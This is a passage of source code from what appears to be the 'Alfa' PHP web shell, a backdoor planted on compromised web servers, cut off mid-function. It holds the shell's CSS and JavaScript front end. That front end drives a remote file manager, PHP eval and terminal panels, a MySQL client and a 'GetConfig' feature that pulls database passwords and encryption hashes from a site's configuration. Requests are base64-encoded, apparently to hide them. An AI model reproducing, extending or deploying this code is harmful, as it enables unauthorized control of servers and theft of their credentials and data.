0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}
<?php 
            echo "\r\n@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}\r\n@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}\r\n@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}\r\n@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}\r\n#alfaloader{\t-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;width:100px;height:100px;}\r\n#a_loader img{\t-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}\r\n.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:\"Comic Sans MS\";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:" . alfa_getColor("header_values") . ';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(' . __showicon('alfamini') . ');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:' . ($GLOBALS['DB_NAME']['show_icons'] == '1' ? '0' : '1') . 'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(' . __showicon('alfamini') . ');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(' . __showicon('btn') . ');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;' . (!@is_writable($GLOBALS['cwd']) ? '}.dir{background-color:red;}' : '}') . '.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}' . alfaCssLoadColors() . '
</style>';
            echo "<script type='text/javascript'>\r\nvar c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\nvar a_ = '" . htmlspecialchars(@$_POST['a']) . "';\r\nvar charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\nvar islinux = " . ($GLOBALS['sys'] != "win" ? 'true' : 'false') . ";\r\nvar post_encryption_mode = " . "true" . ";";
            ?>
var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&amp;path="+c_+"&amp;file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in 